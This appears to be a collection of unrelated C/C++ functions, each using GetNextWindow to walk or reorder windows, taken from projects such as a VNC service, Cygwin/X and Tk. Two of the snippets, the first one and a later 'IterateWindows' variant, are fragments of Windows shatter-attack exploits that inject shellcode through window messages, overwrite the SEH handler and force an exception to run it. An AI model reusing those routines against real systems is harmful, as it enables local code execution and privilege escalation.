void IterateWindows(long hWnd) { long childhWnd,looper; childhWnd = GetNextWindow(hWnd,GW_CHILD); while (childhWnd != NULL) { IterateWindows(childhWnd); childhWnd = GetNextWindow(childhWnd ,GW_HWNDNEXT); } hLVControl = hWnd; hHdrControl = SendMessage((HWND) hLVControl,(UINT) LVM_GETHEADER, 0,0); if(hHdrControl != NULL) { // Found a Listview Window with a Header printf("+ Found listview window..0x%xh\n",hLVControl); printf("+ Found lvheader window..0x%xh\n",hHdrControl); // Inject shellcode to known address printf("+ Sending shellcode to...0x%xh\n",shellcodeaddr); for (looper=0;looper<sizeof(exploit);looper++) doWrite((long) exploit[looper],(shellcodeaddr + looper)); // Overwrite SEH printf("+ Overwriting Top SEH....0x%xh\n",sehHandler); doWrite(((shellcodeaddr) & 0xff),sehHandler); doWrite(((shellcodeaddr >> 8) & 0xff),sehHandler+1); doWrite(((shellcodeaddr >> 16) & 0xff),sehHandler+2); doWrite(((shellcodeaddr >> 24) & 0xff),sehHandler+3); // Cause exception printf("+ Forcing Unhandled Exception\n"); SendMessage((HWND) hHdrControl,(UINT) HDM_GETITEMRECT,0,1); printf("+ Done...\n"); exit(0); }
HWND vncService::FindWindowByTitle(char *substr) { char l_substr[256]; strncpy(l_substr, substr, 255); l_substr[255] = 0; int i; for (i = 0; i < (int)strlen(substr); i++) { l_substr[i] = tolower(l_substr[i]); } char title[256]; HWND hWindow = GetForegroundWindow(); while (hWindow != NULL) { int len = GetWindowText(hWindow, title, 256); for (i = 0; i < len; i++) { title[i] = tolower(title[i]); } DWORD style = GetWindowLong(hWindow, GWL_STYLE); if ((style & WS_VISIBLE) != 0 && strstr(title, l_substr) != NULL) { if (IsIconic(hWindow)) SendMessage(hWindow, WM_SYSCOMMAND, SC_RESTORE, 0); SetForegroundWindow(hWindow); break; } hWindow = GetNextWindow(hWindow, GW_HWNDNEXT); } if (hWindow == NULL) { MessageBox(NULL, "Unable to find a window with the specified title.", szAppName, MB_ICONEXCLAMATION | MB_OK); } return hWindow; }
HWND vncService::FindWindowByTitle(char *substr) { char l_substr[256]; strncpy(l_substr, substr, 255); l_substr[255] = 0; int i; for (i = 0; i < (int)strlen(substr); i++) { l_substr[i] = tolower(l_substr[i]); } char title[256]; HWND hWindow = GetForegroundWindow(); while (hWindow != NULL) { int len = GetWindowText(hWindow, title, 256); for (i = 0; i < len; i++) { title[i] = tolower(title[i]); } LONG_PTR style = GetWindowLongPtr(hWindow, GWL_STYLE); if ((style & WS_VISIBLE) != 0 && strstr(title, l_substr) != NULL) { if (IsIconic(hWindow)) SendMessage(hWindow, WM_SYSCOMMAND, SC_RESTORE, 0); SetForegroundWindow(hWindow); break; } hWindow = GetNextWindow(hWindow, GW_HWNDNEXT); } return hWindow; }
void winReorderWindowsMultiWindow (void) { HWND hwnd = NULL; WindowPtr pWin = NULL; WindowPtr pWinSib = NULL; XID vlist[2]; static Bool fRestacking = FALSE; /* Avoid recusive calls to this function */ DWORD dwCurrentProcessID = GetCurrentProcessId (); DWORD dwWindowProcessID = 0; #if CYGMULTIWINDOW_DEBUG || CYGWINDOWING_DEBUG winTrace ("winReorderWindowsMultiWindow\n"); #endif if (fRestacking) { /* It is a recusive call so immediately exit */ #if CYGWINDOWING_DEBUG ErrorF ("winReorderWindowsMultiWindow - " "exit because fRestacking == TRUE\n"); #endif return; } fRestacking = TRUE; /* Loop through top level Window windows, descending in Z order */ for ( hwnd = GetTopWindow (NULL); hwnd; hwnd = GetNextWindow (hwnd, GW_HWNDNEXT) ) { /* Don't take care of other Cygwin/X process's windows */ GetWindowThreadProcessId (hwnd, &dwWindowProcessID); if ( GetProp (hwnd, WIN_WINDOW_PROP) && (dwWindowProcessID == dwCurrentProcessID) && !IsIconic (hwnd) ) /* ignore minimized windows */ { pWinSib = pWin; pWin = GetProp (hwnd, WIN_WINDOW_PROP); if (!pWinSib) { /* 1st window - raise to the top */ vlist[0] = Above; ConfigureWindow (pWin, CWStackMode, vlist, wClient(pWin)); } else { /* 2nd or deeper windows - just below the previous one */ vlist[0] = winGetWindowID (pWinSib); vlist[1] = Below; ConfigureWindow (pWin, CWSibling | CWStackMode, vlist, wClient(pWin)); } } } fRestacking = FALSE; }
static BOOL CALLBACK enumWindowsProc(HWND hwnd, LPARAM lParam) { bool visible = (GetWindowLongPtrW(hwnd, GWL_STYLE) & WS_VISIBLE) != 0; BOOL iconic = IsIconic(hwnd); if (visible && !iconic) { RECT rc; EnumParam * param = (EnumParam *)lParam; GetWindowRect(hwnd, &rc); IntersectRect(&rc, &(param->bounds), &rc); if (rc.right <= rc.left || rc.bottom <= rc.top) return TRUE; HWND next = hwnd; while (next != NULL && next != param->target) { next = GetNextWindow(next, GW_HWNDPREV); } bool below = (next == param->target); if (!below) { if (param->isOverflow()) { return FALSE; } param->add(rc); } } return TRUE; }
HWND GetMainWindowHandle(DWORD processId) { if (!HeXModule()/* && !DesktopWidget()*/) { return FindWindow(GetMainWindowClassName(processId), NULL); } /*if (DesktopWidget()) { HWND desktop = FindWindow(L"Progman", NULL); desktop = GetWindow(desktop, GW_CHILD); HWND main_window = FindWindowEx(desktop, NULL, GetMainWindowClassName(processId), NULL); return main_window; }*/ seekedHandle = NULL; HWND topWindow = GetTopWindow(NULL); while (topWindow){ DWORD pid = 0; DWORD threadId = GetWindowThreadProcessId(topWindow, &pid); if (threadId != 0 && pid == processId) { EnumChildWindows(topWindow, EnumChildBrowserProc, (LPARAM)pid); if (seekedHandle) { return GetAncestor(seekedHandle, GA_ROOT); } } topWindow = GetNextWindow(topWindow, GW_HWNDNEXT); } return NULL; }
static HWND GetNextAppWindow(HWND base_hwnd, BOOL nontopmost_onlyp) { HWND next_hwnd = base_hwnd; DWORD style; DWORD exstyle; while (TRUE) { next_hwnd = GetNextWindow(next_hwnd, GW_HWNDNEXT); if (next_hwnd == NULL) break; style = GetWindowLongPtr(next_hwnd, GWL_STYLE); if ((!(style & WS_VISIBLE)) || (style & WS_DISABLED)) continue; exstyle = GetWindowLongPtr(next_hwnd, GWL_EXSTYLE); if (exstyle & WS_EX_TOOLWINDOW) continue; if (nontopmost_onlyp && IsTopmostP(next_hwnd)) continue; break; } return next_hwnd; }
HWND GetWindowById(DWORD pId) { HWND hwndCurrent = GetWindow(GetDesktopWindow(), GW_CHILD); if (hwndCurrent == nullptr) { Log("ERROR | GetWindowById | Couldn't get desktop window handle!"); LogLastError(); return nullptr; } DWORD pIdCurrent = 0; do { GetWindowThreadProcessId(hwndCurrent, &pIdCurrent); // checking for GetWindowTextLength to not equal 0 is to ensure that we found // the actual game window, not the small icon that pops up just before the game starts if (pIdCurrent == pId && IsWindowVisible(hwndCurrent) && GetWindowTextLength(hwndCurrent) != 0) { Log("INFO | GetWindowById | Found window with pId", pId); return hwndCurrent; } } while (hwndCurrent = GetNextWindow(hwndCurrent, GW_HWNDNEXT)); return nullptr; }
HWND FindWindowByTitle(wstring find, bool exact) { wchar_t _title[256]; HWND hWnd = GetForegroundWindow(); while (hWnd != NULL) { int len = GetWindowText(hWnd, _title, 256); wstring title(_title); DWORD PID; GetWindowThreadProcessId(hWnd, &PID); if (GetCurrentProcessId() == PID) { if (exact) { if (!title.compare(find)) break; } else { if (!title.compare(0, find.length(), find)) break; } } hWnd = GetNextWindow(hWnd, GW_HWNDNEXT); } if (!hWnd) OutputDebugStringEx(L"Unable to find window \"%s\"", find.c_str()); else OutputDebugStringEx(L"HWND: 0x%x", hWnd); return hWnd; }
BOOL HideOnFullScreen() { BOOL bFullscreen = FALSE; HWND hWnd = 0; if (fcOpt.bHideWhenFullscreen) { int w = GetSystemMetrics(SM_CXSCREEN); int h = GetSystemMetrics(SM_CYSCREEN); hWnd = GetForegroundWindow(); while (GetWindowLongPtr(hWnd, GWL_EXSTYLE) & WS_EX_TOPMOST) { RECT WindowRect; GetWindowRect(hWnd, &WindowRect); if (w == WindowRect.right - WindowRect.left && h == WindowRect.bottom - WindowRect.top) { bFullscreen = TRUE; break; } hWnd = GetNextWindow(hWnd, GW_HWNDNEXT); } } return bFullscreen && fcOpt.bHideWhenFullscreen; }
/* ウィンドウの端が実際に表示されているか判定する これだと不完全(常に最前面のウィンドウを考慮していない) */ static bool IsWindowEdgeVisible(HWND hwnd,HWND hwndTop,const RECT *pRect,HWND hwndTarget) { RECT rc,rcEdge; HWND hwndNext; if (hwndTop==hwnd || hwndTop==NULL) return true; GetWindowRect(hwndTop,&rc); hwndNext=GetNextWindow(hwndTop,GW_HWNDNEXT); if (hwndTop==hwndTarget || !IsWindowVisible(hwndTop) || rc.left==rc.right || rc.top==rc.bottom) return IsWindowEdgeVisible(hwnd,hwndNext,pRect,hwndTarget); if (pRect->top==pRect->bottom) { if (rc.top<=pRect->top && rc.bottom>pRect->top) { if (rc.left<=pRect->left && rc.right>=pRect->right) return false; if (rc.left<=pRect->left && rc.right>pRect->left) { rcEdge=*pRect; rcEdge.right=min(rc.right,pRect->right); return IsWindowEdgeVisible(hwnd,hwndNext,&rcEdge,hwndTarget); } else if (rc.left>pRect->left && rc.right>=pRect->right) { rcEdge=*pRect; rcEdge.left=rc.left; return IsWindowEdgeVisible(hwnd,hwndNext,&rcEdge,hwndTarget); } else if (rc.left>pRect->left && rc.right<pRect->right) { rcEdge=*pRect; rcEdge.right=rc.left; if (IsWindowEdgeVisible(hwnd,hwndNext,&rcEdge,hwndTarget)) return true; rcEdge.left=rc.right; rcEdge.right=pRect->right; return IsWindowEdgeVisible(hwnd,hwndNext,&rcEdge,hwndTarget); } } } else { if (rc.left<=pRect->left && rc.right>pRect->left) { if (rc.top<=pRect->top && rc.bottom>=pRect->bottom) return false; if (rc.top<=pRect->top && rc.bottom>pRect->top) { rcEdge=*pRect; rcEdge.bottom=min(rc.bottom,pRect->bottom); return IsWindowEdgeVisible(hwnd,hwndNext,&rcEdge,hwndTarget); } else if (rc.top>pRect->top && rc.bottom>=pRect->bottom) { rcEdge=*pRect; rcEdge.top=rc.top; return IsWindowEdgeVisible(hwnd,hwndNext,&rcEdge,hwndTarget); } else if (rc.top>pRect->top && rc.bottom<pRect->bottom) { rcEdge=*pRect; rcEdge.bottom=rc.top; if (IsWindowEdgeVisible(hwnd,hwndNext,&rcEdge,hwndTarget)) return true; rcEdge.top=rc.bottom; rcEdge.bottom=pRect->bottom; return IsWindowEdgeVisible(hwnd,hwndNext,&rcEdge,hwndTarget); } } } return IsWindowEdgeVisible(hwnd,hwndNext,pRect,hwndTarget); }
static int HandleMacEvents(void) { EventRecord theEvent; int eventFound = 0, needsUpdate = 0; Point currentMouse; WindowRef windowRef; Rect mouseRect; /* * Check for mouse moved events. These events aren't placed on the * system event queue unless we call WaitNextEvent. */ GetGlobalMouse(¤tMouse); if ((notifier.eventProcPtr != NULL) && !EqualPt(currentMouse, notifier.lastMousePosition)) { notifier.lastMousePosition = currentMouse; theEvent.what = nullEvent; if ((*notifier.eventProcPtr)(&theEvent) == true) { eventFound = 1; } } /* * Check for update events. Since update events aren't generated * until we call GetNextEvent, we may need to force a call to * GetNextEvent, even if the queue is empty. */ for (windowRef = FrontWindow(); windowRef != NULL; windowRef = GetNextWindow(windowRef)) { GetWindowUpdateRgn(windowRef, notifier.utilityRgn); if (!EmptyRgn(notifier.utilityRgn)) { needsUpdate = 1; break; } } /* * Process events from the OS event queue. */ while (needsUpdate || (GetEvQHdr()->qHead != NULL)) { GetGlobalMouse(¤tMouse); SetRect(&mouseRect, currentMouse.h, currentMouse.v, currentMouse.h + 1, currentMouse.v + 1); RectRgn(notifier.utilityRgn, &mouseRect); WaitNextEvent(everyEvent, &theEvent, 5, notifier.utilityRgn); needsUpdate = 0; if ((notifier.eventProcPtr != NULL) && ((*notifier.eventProcPtr)(&theEvent) == true)) { eventFound = 1; } } return eventFound; }
void HooksUpdateDetector::broadcastMessage(UINT message) { HWND hwndFound = FindWindowEx(HWND_MESSAGE, 0, 0, 0); while(hwndFound) { PostMessage(hwndFound, message, 0, 0); hwndFound = GetNextWindow(hwndFound, GW_HWNDNEXT); } }
MFCDERIVED_API void afxSubWindow(HWND hWnd) { HWND hChild=GetWindow(hWnd,GW_CHILD); for(;hChild;hChild=GetNextWindow(hChild,GW_HWNDNEXT)) { afxSubClientWindow(hChild); } }
void winMWExtWMReorderWindows (ScreenPtr pScreen) { winScreenPriv(pScreen); HWND hwnd = NULL; win32RootlessWindowPtr pRLWin = NULL; win32RootlessWindowPtr pRLWinSib = NULL; DWORD dwCurrentProcessID = GetCurrentProcessId (); DWORD dwWindowProcessID = 0; XID vlist[2]; #if CYGMULTIWINDOW_DEBUG && FALSE winDebug ("winMWExtWMReorderWindows\n"); #endif pScreenPriv->fRestacking = TRUE; if (pScreenPriv->fWindowOrderChanged) { #if CYGMULTIWINDOW_DEBUG winDebug ("winMWExtWMReorderWindows - Need to restack\n"); #endif hwnd = GetTopWindow (NULL); while (hwnd) { GetWindowThreadProcessId (hwnd, &dwWindowProcessID); if ((dwWindowProcessID == dwCurrentProcessID) && GetProp (hwnd, WIN_WINDOW_PROP)) { pRLWinSib = pRLWin; pRLWin = (win32RootlessWindowPtr)GetProp (hwnd, WIN_WINDOW_PROP); if (pRLWinSib) { vlist[0] = pRLWinSib->pFrame->win->drawable.id; vlist[1] = Below; ConfigureWindow (pRLWin->pFrame->win, CWSibling | CWStackMode, vlist, wClient(pRLWin->pFrame->win)); } else { /* 1st window - raise to the top */ vlist[0] = Above; ConfigureWindow (pRLWin->pFrame->win, CWStackMode, vlist, wClient(pRLWin->pFrame->win)); } } hwnd = GetNextWindow (hwnd, GW_HWNDNEXT); } } pScreenPriv->fRestacking = FALSE; pScreenPriv->fWindowOrderChanged = FALSE; }
void activateWithoutRaise(HWND window) { DEBUGLOG("Activating window 0x%X without raising", window); // Save the Z position of the previously active window. HWND insertAfter = GetNextWindow(window, GW_HWNDPREV); SetForegroundWindow(window); // This has pulled it to the front; so change its position in the Z order back. SetWindowPos(window, insertAfter, 0, 0, 0, 0, SWP_NOACTIVATE | SWP_NOMOVE | SWP_NOSIZE); }
//---------------------------------------------------------------------------- // STDMETHODIMP CAnchoAddonService::updateWindow(INT aWindowId, LPDISPATCH aProperties) { if (!aProperties) { return E_INVALIDARG; } HWND hwnd = winIdToHWND(aWindowId); if (!isIEWindow(hwnd)) { return E_INVALIDARG; } CIDispatchHelper properties = aProperties; WINDOWINFO winInfo; winInfo.cbSize = sizeof(WINDOWINFO); BOOL res = GetWindowInfo(hwnd, &winInfo); int top = winInfo.rcWindow.top; int left = winInfo.rcWindow.left; int width = winInfo.rcWindow.right - winInfo.rcWindow.left; int height = winInfo.rcWindow.bottom - winInfo.rcWindow.top; bool shouldMove = SUCCEEDED((properties.Get<int, VT_I4>(L"top", top))); shouldMove = SUCCEEDED((properties.Get<int, VT_I4>(L"left", left))) || shouldMove; shouldMove = SUCCEEDED((properties.Get<int, VT_I4>(L"width", width))) || shouldMove; shouldMove = SUCCEEDED((properties.Get<int, VT_I4>(L"height", height))) || shouldMove; if (shouldMove) { ::MoveWindow(hwnd, left, top, width, height, TRUE); } bool focused = false; if (SUCCEEDED((properties.Get<bool, VT_BOOL, VARIANT_BOOL>(L"focused", focused)))) { if(focused) { ::SetForegroundWindow(hwnd); } else { //Bring to foreground next IE window HWND nextWin = hwnd; while (nextWin = GetNextWindow(nextWin, GW_HWNDNEXT)) { if (isIEWindow(hwnd)) { ::SetForegroundWindow(nextWin); break; } } } } std::wstring state; if ( SUCCEEDED((properties.Get<std::wstring, VT_BSTR, BSTR>(L"state", state)))) { if (state == L"maximized") { ::ShowWindow(hwnd, SW_MAXIMIZE); } else if (state == L"minimized") { ::ShowWindow(hwnd, SW_MINIMIZE); } else if (state == L"normal") { ::ShowWindow(hwnd, SW_NORMAL); } else if (state == L"fullscreen") { //TODO - fullscreen } } //TODO - drawAttention return S_OK; }
static void update_zorder(HWND hwnd) { HWND behind; HWND block_hwnd, block_behind; unsigned int serial; WaitForSingleObject(g_mutex, INFINITE); serial = g_blocked_zchange_serial; block_hwnd = g_blocked_zchange[0]; block_behind = g_blocked_zchange[1]; ReleaseMutex(g_mutex); vchannel_block(); behind = GetNextWindow(hwnd, GW_HWNDPREV); while (behind) { LONG style; style = GetWindowLong(behind, GWL_STYLE); if ((!(style & WS_CHILD) || (style & WS_POPUP)) && (style & WS_VISIBLE)) break; behind = GetNextWindow(behind, GW_HWNDPREV); } if ((hwnd == block_hwnd) && (behind == block_behind)) vchannel_write("ACK", "%u", serial); else { int flags = 0; LONG exstyle = GetWindowLong(hwnd, GWL_EXSTYLE); // handle always on top if (exstyle & WS_EX_TOPMOST) flags |= SEAMLESS_CREATE_TOPMOST; vchannel_write("ZCHANGE", "0x%08lx,0x%08lx,0x%08x", hwnd, behind, flags); } vchannel_unblock(); }
void CBZInspectView::OnInitialUpdate() { CFormView::OnInitialUpdate(); // TODO: ここに特定なコードを追加するか、もしくは基本クラスを呼び出してください。 m_check_intel.SetCheck(!options.bByteOrder); m_check_signed.SetCheck(m_bSigned); _UpdateChecks(); m_pView = (CBZView*)GetNextWindow(); }
static void CheckRB(HWND hWnd, HWND hWndRB) { HWND hChild; for (hChild = GetWindow(hWnd, GW_CHILD); hChild; hChild = GetNextWindow(hChild, GW_HWNDNEXT)) if (hChild == hWndRB) SendMessage(hChild, BM_SETCHECK, 1, 0L); else SendMessage(hChild, BM_SETCHECK, 0, 0L); }
STATIC int ExecuteTarget(LPTSTR lpCmdLine) { HWND hWnd = NULL; // DWORD dwExitCode = ERROR_SUCCESS; PROCESS_INFORMATION pi = { 0 }; STARTUPINFO si = { sizeof(STARTUPINFO), 0 }; /* Execute the process */ if (CreateProcess( NULL, /* No module name (use command line) */ lpCmdLine, /* Command line */ NULL, /* Process handle not inheritable */ NULL, /* Thread handle not inheritable */ FALSE, /* Set handle inheritance to FALSE */ 0, /* No creation flags */ NULL, /* Use parent's environment block */ NULL, /* Use parent's starting directory */ &si, /* Pointer to STARTUPINFO structure */ &pi /* Pointer to PROCESS_INFORMATION structure */ )) { DWORD dwProcessId = 0; /* Wait until target executable has finished its initialization */ WaitForInputIdle(pi.hProcess, INFINITE); /* Find target executable window */ hWnd = GetTopWindow(0); while(hWnd != NULL) { GetWindowThreadProcessId(hWnd, &dwProcessId); if (dwProcessId == pi.dwProcessId) { /* And move it to the top. */ SetWindowPos(hWnd, HWND_TOP, 0, 0, 0, 0, SWP_NOMOVE | SWP_NOSIZE); break; } hWnd = GetNextWindow(hWnd, GW_HWNDNEXT); } /* Wait until target executable exits. */ // Nah //WaitForSingleObject(pi.hProcess, INFINITE); //GetExitCodeProcess(pi.hProcess, &dwExitCode); /* Close process and thread handles. */ CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } else { FatalError(ERROR_SUCCESS, _T("Failed to execute cmdline: %s"), lpCmdLine); xfree(lpCmdLine); } return ERROR_SUCCESS; }
void TkMacOSXFlushWindows () { WindowRef wRef = GetWindowList(); while (wRef) { CGrafPtr portPtr = GetWindowPort(wRef); if (QDIsPortBuffered(portPtr)) { QDFlushPortBuffer(portPtr, NULL); } wRef = GetNextWindow(wRef); } }
HWND getOctaveWindow(char *octaveWindowName) { HWND wnd = GetTopWindow(GetDesktopWindow()); while (wnd) { char titulo[256]; GetWindowTextA(wnd, titulo, 255); if (strcmp(titulo, octaveWindowName) == 0) return wnd; wnd = GetNextWindow(wnd, GW_HWNDNEXT); } return NULL; }
bool System::FindProcessWindow( HWND& hWnd, ulong pId ) { ulong pIdtemp = 0; for( HWND hWndTemp = GetTopWindow( 0 ); hWndTemp != 0; hWndTemp = GetNextWindow( hWndTemp, GW_HWNDNEXT ) ) { GetWindowThreadProcessId( hWndTemp, &pIdtemp ); if( pId == pIdtemp ) { hWnd = hWndTemp; return true; } } return false; }
/****************************************************************************** Function Name : OnClose Input(s) : Output : void Functionality : Member of : CTSExecutorChildFrame Friend of : - Author(s) : Venkatanarayana Makam Date Created : 28/04/2011 Modifications : Code Tag : ******************************************************************************/ void CTSExecutorChildFrame::OnClose() { WINDOWPLACEMENT wndPlcmnt; GetWindowPlacement(&wndPlcmnt); wndPlcmnt.showCmd = SW_HIDE; SetWindowPlacement(&wndPlcmnt); CWnd* pActivateWnd = GetNextWindow(); pActivateWnd->SetForegroundWindow(); pActivateWnd->SetFocus(); ShowWindow(SW_HIDE); }
HWND FindMyTopMostWindow() { DWORD dwProcID = GetCurrentProcessId(); HWND hWnd = GetTopWindow(GetDesktopWindow()); while(hWnd) { DWORD dwWndProcID = 0; GetWindowThreadProcessId(hWnd, &dwWndProcID); if(dwWndProcID == dwProcID) return hWnd; hWnd = GetNextWindow(hWnd, GW_HWNDNEXT); } return NULL; }
void IterateWindows(long hWnd) { long childhWnd,looper; childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD); while (childhWnd != NULL) { IterateWindows(childhWnd); childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT); } GetClassName( (HWND)hWnd, g_classNameBuf, sizeof(g_classNameBuf) ); if ( strcmp(g_classNameBuf, "msctls_statusbar32") ==0) { // Find Heap Address BruteForceHeap((HWND) hWnd); // Inject shellcode to known address printf("+ Sending shellcode to......0x%xh\n",shellcodeaddr); for (looper=0;looper<sizeof(exploit);looper++) doWrite((HWND)hWnd, (long) exploit[looper],(shellcodeaddr + looper)); // Overwrite SEH printf("+ Overwriting Top SEH.......0x%xh\n",sehHandler); doWrite((HWND)hWnd, ((shellcodeaddr) & 0xff),sehHandler); doWrite((HWND)hWnd, ((shellcodeaddr >> 8) & 0xff),sehHandler+1); doWrite((HWND)hWnd, ((shellcodeaddr >> 16) & 0xff),sehHandler+2); doWrite((HWND)hWnd, ((shellcodeaddr >> 24) & 0xff),sehHandler+3); // Cause exception printf("+ Forcing Unhandled Exception\n"); SendMessage((HWND) hWnd,(UINT) SB_GETPARTS,1,1); printf("+ Done...\n"); exit(0); }
HWND CSkinBase::GetChildWnd(HWND pParent, LPCTSTR szClass, int nID) { HWND hChild = ::GetWindow(hParent, GW_CHILD); while (hChild) { if (CWinClasses::IsClass(hChild, szClass)) { if (nID == -1 || GetDlgCtrlID(hChild) == nID) return hChild; } hChild = GetNextWindow(hChild, GW_HWNDNEXT); } return NULL; }
static INT_PTR CALLBACK DialogProc(HWND theDialog, UINT msgCode, WPARAM wParam, LPARAM lParam) { int itemID, notificationMessage; BOOL result; // Function result static DialogStoragePtr dsp; result = FALSE; itemID = LOWORD(wParam); // Item, control, or accelerator identifier. notificationMessage = HIWORD(wParam); switch(msgCode) { case WM_INITDIALOG: // Position nicely relative to the main dialog. PositionWinDialogWindow(theDialog, GetNextWindow(theDialog, GW_HWNDNEXT)); dsp = (DialogStoragePtr)lParam; if (InitDialogSettings(theDialog, dsp) != 0) { EndDialog(theDialog, IDCANCEL); // Should never happen. return FALSE; } SetFocus(GetDlgItem(theDialog, SCALING_OFFSET_TEXT)); result = FALSE; // Tell Windows not to set the input focus break; case WM_COMMAND: switch(itemID) { case OK_BUTTON: case CANCEL_BUTTON: HandleItemHit(theDialog, itemID, dsp); ShutdownDialogSettings(theDialog, dsp); EndDialog(theDialog, itemID); result = TRUE; break; default: if (!IsWinDialogItemHitMessage(theDialog, itemID, notificationMessage)) break; // This is not a message that we need to handle. HandleItemHit(theDialog, itemID, dsp); break; } break; } return result; }
static void zorder_sync( Handle self, HWND me, LPWINDOWPOS lp) { if ( lp-> hwndInsertAfter == HWND_TOP || lp-> hwndInsertAfter == HWND_NOTOPMOST || lp-> hwndInsertAfter == HWND_TOPMOST) { me = GetNextWindow( me, GW_HWNDPREV); if ( me) PostMessage( me, WM_ZORDERSYNC, 0, 0); } else if ( lp-> hwndInsertAfter == HWND_BOTTOM) { me = GetNextWindow( me, GW_HWNDNEXT); if ( me) PostMessage( me, WM_ZORDERSYNC, 0, 0); } }